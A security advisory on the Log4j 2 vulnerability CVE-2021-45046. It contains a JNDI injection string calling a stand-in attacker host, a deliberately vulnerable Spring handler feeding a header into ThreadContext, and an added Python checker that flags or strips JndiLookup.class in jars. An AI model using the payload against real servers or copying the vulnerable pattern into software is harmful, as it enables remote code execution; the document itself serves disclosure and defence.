A new attack vector for Log4j 2 that bypasses the added protection

A new vulnerability (CVE-2021-45046) has been found in the JNDI lookup handling of the Log4j 2 library. The problem persists despite the fixes added in release 2.15 and regardless of whether the log4j2.formatMsgNoLookups protection setting is enabled. The issue mainly affects older releases of Log4j 2 that were protected only by the formatMsgNoLookups flag, because it allows that protection against the earlier vulnerability (Log4Shell, CVE-2021-44228) to be bypassed, leading to arbitrary code execution on the server. For users of release 2.15, the impact is limited to a denial of service through exhaustion of available resources.

The vulnerability appears only on systems whose logging configuration uses Context Lookups, such as ${ctx:loginId}, or MDC (Thread Context Map) patterns such as %X, %mdc and %MDC. Exploitation consists of arranging for logged data to contain JNDI substitutions while the application uses context lookups or MDC patterns in the rules that define the format of the log output.

LunaSec researchers noted that for Log4j releases before 2.15 this flaw can be used as a new attack vector for Log4Shell, leading to code execution whenever ThreadContext entries that accept external data are used during logging, regardless of whether the formatMsgNoLookups flag or the %m{nolookups} pattern protection is enabled.


The exploit consists of placing "${jndi:ldap://attacker.com/a}" not directly in the log message, but in the value of an intermediate variable that is referenced in the log format rule. For example, if the context lookup ${ctx:apiversion} is used in the log output, the attack can be performed by placing "${jndi:ldap://attacker.com/a}" in the value that is written into the apiversion variable. Example of vulnerable code:

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    @GetMapping("/")
    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        // The HTTP header "X-Api-Version" is copied into the ThreadContext
        ThreadContext.put("apiversion", apiVersion);
        // When the line is written, the externally supplied value is processed
        // through the ${ctx:apiversion} substitution in the layout pattern
        logger.info("Received a request for API version");
        return "Hello, world!";
    }

In Log4j 2.15 the vulnerability can be used for DoS attacks by passing a value into the ThreadContext that causes the format template processing to loop.


Updates 2.16 and 2.12.2 have been released to fix the vulnerability. In the Log4j 2.16 branch, in addition to the fixes already made in release 2.15 and the restriction of JNDI LDAP lookups to "localhost", JNDI functionality is now disabled by default entirely and support for message lookup patterns has been removed. The suggested workaround is to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
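The fix and the workaround above translate into two checks a practitioner wants to run over a deployed log4j-core jar: which release it is, and whether JndiLookup.class is still inside it. The following is an added example written for this page, not a tool from the Log4j project. It assumes that Maven-built log4j-core jars record their version in META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, treats 2.16.0 and 2.12.2 (and later releases on those branches) as the fixed releases named above, and builds constructed stand-in jars in memory so it runs offline; the function names are the example's own.

```python
import io
import re
import zipfile

# Added example, not from the advisory or the Log4j project. It assesses a
# log4j-core jar the way the mitigation above implies: read the release
# version, look for the JndiLookup class, and optionally strip that class.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption: Maven-built log4j-core jars record their version in this file.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        return None
    return tuple(int(part or 0) for part in match.groups())


def read_version(zf):
    try:
        props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return parse_version(line.split("=", 1)[1].strip())
    return None


def release_has_fix(version):
    # 2.16.0 and 2.12.2 are the releases named above as fixing CVE-2021-45046;
    # later releases on those branches are treated the same way.
    return version >= (2, 16, 0) or (2, 12, 2) <= version < (2, 13, 0)


def assess_jar(jar):
    """jar is a path or file object; returns version, class presence and a verdict."""
    with zipfile.ZipFile(jar) as zf:
        version = read_version(zf)
        has_jndi = JNDI_LOOKUP_CLASS in zf.namelist()
    if version is None:
        status = "unknown-version"
    elif release_has_fix(version):
        status = "fixed"
    elif not has_jndi:
        status = "mitigated"   # JndiLookup removed by hand, as in the zip -d workaround
    else:
        status = "vulnerable"
    return {"version": version, "has_jndi_lookup": has_jndi, "status": status}


def strip_jndi_lookup(src, dst):
    """Copy src to dst without JndiLookup.class; the Python form of
    'zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class'."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def make_sample_jar(version, include_jndi=True):
    # Constructed stand-in for a real log4j-core jar so the check runs offline;
    # the class entries are placeholder bytes, not compiled classes.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    "version=%s\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n" % version)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    buf.seek(0)
    return buf


def strip_and_reassess(version):
    # Apply the workaround to a vulnerable sample and re-run the check on the result.
    dst = io.BytesIO()
    removed = strip_jndi_lookup(make_sample_jar(version), dst)
    dst.seek(0)
    return removed, assess_jar(dst)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, assess_jar(path))          # real jars given on the command line
    for v in ("2.14.1", "2.15.0", "2.12.2", "2.16.0"):
        print(v, assess_jar(make_sample_jar(v))["status"])
    print(strip_and_reassess("2.15.0"))
```

Run it with paths to the jars found on a host (for example the output of `find / -name 'log4j-core-*.jar'`) to get a verdict per file; note that "mitigated" only confirms the class is gone and says nothing about shaded copies of Log4j embedded in other jars, which need the same check applied to each nested archive.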

You can follow the availability of package fixes on the distribution pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and from Java platform vendors (GitHub, Docker, Oracle, VMware, Broadcom, Amazon/AWS, Juniper, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).

Source: opennet.ru
